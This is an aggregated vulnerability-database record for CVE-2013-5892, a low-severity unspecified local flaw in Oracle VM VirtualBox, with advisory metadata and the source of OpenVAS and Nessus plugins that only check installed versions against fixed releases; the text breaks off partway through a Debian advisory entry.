Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)

2014-01-23T00:00:00

Description

This host is installed with Oracle VM VirtualBox and is prone to unspecified vulnerability.

{"id": "OPENVAS:1361412562310804194", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "published": "2014-01-23T00:00:00", "modified": "2020-05-12T00:00:00", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804194", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/56490", "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html"], "cvelist": ["CVE-2013-5892"], "lastseen": "2020-05-15T17:26:36", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2878-1:66F21"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5892"]}, {"type": "freebsd", "idList": ["81F1FDC2-7EC7-11E3-A6C6-00163E1ED244"]}, {"type": "gentoo", "idList": ["GLSA-201401-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2878.NASL", "FREEBSD_PKG_81F1FDC27EC711E3A6C600163E1ED244.NASL", "GENTOO_GLSA-201401-13.NASL", "VIRTUALBOX_4_3_6.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121110", "OPENVAS:1361412562310702878", "OPENVAS:1361412562310804192", "OPENVAS:1361412562310804193", "OPENVAS:702878"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2014-1972949"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30292", "SECURITYVULNS:VULN:13537"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5892"]}], "rev": 4}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-5892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2878-1:66F21"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5892"]}, {"type": "freebsd", "idList": ["81F1FDC2-7EC7-11E3-A6C6-00163E1ED244"]}, {"type": "gentoo", "idList": ["GLSA-201401-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2878.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:702878"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2014-1972949"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13537"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5892"]}]}, "exploitation": null, "vulnersScore": 4.1}, "pluginID": "1361412562310804194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804194\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:45:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the references advisory.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "General", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T14:19:36", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {}, "published": "2014-01-15T16:08:00", "type": "cve", "title": "CVE-2013-5892", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:oracle:vm_virtualbox:4.1.14", "cpe:/a:oracle:vm_virtualbox:4.1.4", "cpe:/a:oracle:vm_virtualbox:3.2.16", "cpe:/a:oracle:vm_virtualbox:4.2.0", "cpe:/a:oracle:vm_virtualbox:4.2.10", "cpe:/a:oracle:vm_virtualbox:4.0.12", "cpe:/a:oracle:vm_virtualbox:4.0.8", "cpe:/a:oracle:vm_virtualbox:4.2.8", "cpe:/a:oracle:vm_virtualbox:4.3.0", "cpe:/a:oracle:vm_virtualbox:3.2.0", "cpe:/a:oracle:vm_virtualbox:4.0.20", "cpe:/a:oracle:vm_virtualbox:4.3.2", "cpe:/a:oracle:vm_virtualbox:4.2.20", "cpe:/a:oracle:vm_virtualbox:4.2.18", "cpe:/a:oracle:vm_virtualbox:4.0.4", "cpe:/a:oracle:vm_virtualbox:3.2.10", "cpe:/a:oracle:vm_virtualbox:4.2.12", "cpe:/a:oracle:vm_virtualbox:4.2.16", "cpe:/a:oracle:vm_virtualbox:4.2.4", "cpe:/a:oracle:vm_virtualbox:4.1.2", "cpe:/a:oracle:vm_virtualbox:3.2.4", "cpe:/a:oracle:vm_virtualbox:4.0.0", "cpe:/a:oracle:vm_virtualbox:3.2.12", "cpe:/a:oracle:vm_virtualbox:4.1.8", "cpe:/a:oracle:vm_virtualbox:4.1.24", "cpe:/a:oracle:vm_virtualbox:4.1.28", "cpe:/a:oracle:vm_virtualbox:4.2.2", "cpe:/a:oracle:vm_virtualbox:4.0", "cpe:/a:oracle:vm_virtualbox:4.1.6", "cpe:/a:oracle:vm_virtualbox:4.1.12", "cpe:/a:oracle:vm_virtualbox:4.0.10", "cpe:/a:oracle:vm_virtualbox:4.0.6", "cpe:/a:oracle:vm_virtualbox:3.2.18", "cpe:/a:oracle:vm_virtualbox:4.2.14", "cpe:/a:oracle:vm_virtualbox:3.2.6", "cpe:/a:oracle:vm_virtualbox:4.0.2", "cpe:/a:oracle:vm_virtualbox:4.1.26", "cpe:/a:oracle:vm_virtualbox:4.1.0", "cpe:/a:oracle:vm_virtualbox:4.0.14", "cpe:/a:oracle:vm_virtualbox:4.1.22", "cpe:/a:oracle:vm_virtualbox:4.1.10", "cpe:/a:oracle:vm_virtualbox:3.2.8", "cpe:/a:oracle:vm_virtualbox:4.0.16", "cpe:/a:oracle:vm_virtualbox:4.3.4", "cpe:/a:oracle:vm_virtualbox:3.2.2", "cpe:/a:oracle:vm_virtualbox:4.0.18", "cpe:/a:oracle:vm_virtualbox:4.2.6", "cpe:/a:oracle:vm_virtualbox:4.1.20", "cpe:/a:oracle:vm_virtualbox:4.1.16", "cpe:/a:oracle:vm_virtualbox:3.2.14", "cpe:/a:oracle:vm_virtualbox:4.1.18"], "id": "CVE-2013-5892", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:vm_virtualbox:4.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:4.1.22:*:*:*:*:*:*:*"]}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nOracle reports:\n\nUnspecified vulnerability in the Oracle VM VirtualBox\n\t component in Oracle Virtualization VirtualBox prior to\n\t 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local\n\t users to affect confidentiality, integrity, and availability\n\t via unknown vectors related to Core.\n\n\n", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "freebsd", "title": "virtualbox-ose -- local vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T00:00:00", "id": "81F1FDC2-7EC7-11E3-A6C6-00163E1ED244", "href": "https://vuxml.freebsd.org/freebsd/81f1fdc2-7ec7-11e3-a6c6-00163e1ed244.html", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:52:26", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle\nVirtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and\n4.3.6 allows local users to affect confidentiality, integrity, and\navailability via unknown vectors related to Core.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=735410>\n * <https://bugs.launchpad.net/ubuntu/precise/+source/virtualbox/+bug/1307725>\n", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5892", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T00:00:00", "id": "UB:CVE-2013-5892", "href": "https://ubuntu.com/security/CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:51:33", "description": "Oracle reports :\n\nUnspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-17T00:00:00", "type": "nessus", "title": "FreeBSD : virtualbox-ose -- local vulnerability (81f1fdc2-7ec7-11e3-a6c6-00163e1ed244)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:virtualbox-ose", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_81F1FDC27EC711E3A6C600163E1ED244.NASL", "href": "https://www.tenable.com/plugins/nessus/72002", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72002);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5892\");\n\n script_name(english:\"FreeBSD : virtualbox-ose -- local vulnerability (81f1fdc2-7ec7-11e3-a6c6-00163e1ed244)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Oracle reports :\n\nUnspecified vulnerability in the Oracle VM VirtualBox component in\nOracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30,\n4.2.22, and 4.3.6 allows local users to affect confidentiality,\nintegrity, and availability via unknown vectors related to Core.\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17c46362\"\n );\n # https://vuxml.freebsd.org/freebsd/81f1fdc2-7ec7-11e3-a6c6-00163e1ed244.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc52d82b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:virtualbox-ose\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"virtualbox-ose<4.2.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:34", "description": "The remote host contains a version of Oracle VM VirtualBox prior to 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6. It is, therefore, potentially affected by an unspecified, local security vulnerability related to a flaw in the 'Core' subcomponent.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-17T00:00:00", "type": "nessus", "title": "Oracle VM VirtualBox < 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6 Local Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:oracle:vm_virtualbox"], "id": "VIRTUALBOX_4_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/72008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(72008);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n\n script_name(english:\"Oracle VM VirtualBox < 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6 Local Vulnerability\");\n script_summary(english:\"Does a version check on VirtualBox.exe\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has an application that is affected by an unspecified,\nlocal security vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host contains a version of Oracle VM VirtualBox prior to\n3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 / 4.3.6. It is, therefore,\npotentially affected by an unspecified, local security vulnerability\nrelated to a flaw in the 'Core' subcomponent.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530945/30/0/threaded\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Oracle VM VirtualBox to 3.2.20 / 4.0.22 / 4.1.30 / 4.2.22 /\n4.3.6 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"virtualbox_installed.nasl\");\n script_require_keys(\"VirtualBox/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('VirtualBox/Version');\npath = get_kb_item_or_exit('SMB/VirtualBox/'+ver);\n\nver_fields = split(ver, sep:'.', keep:FALSE);\nmajor = int(ver_fields[0]);\nminor = int(ver_fields[1]);\nrev = int(ver_fields[2]);\n\nif (major == 3 && minor == 2 && rev < 20) fix = '3.2.20';\nelse if (major == 4 && minor == 0 && rev < 22) fix = '4.0.22';\nelse if (major == 4 && minor == 1 && rev < 30) fix = '4.1.30';\nelse if (major == 4 && minor == 2 && rev < 22) fix = '4.2.22';\nelse if (major == 4 && minor == 3 && rev < 6) fix = '4.3.6';\n\nif (fix)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Oracle VM VirtualBox', ver, path);\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86 virtualisation solution, resulting in denial of service, privilege escalation and an information leak.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-14T00:00:00", "type": "nessus", "title": "Debian DSA-2878-1 : virtualbox - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:virtualbox", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2878.NASL", "href": "https://www.tenable.com/plugins/nessus/72993", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2878. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72993);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_bugtraq_id(64905, 64909, 64911, 64913);\n script_xref(name:\"DSA\", value:\"2878\");\n\n script_name(english:\"Debian DSA-2878-1 : virtualbox - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information 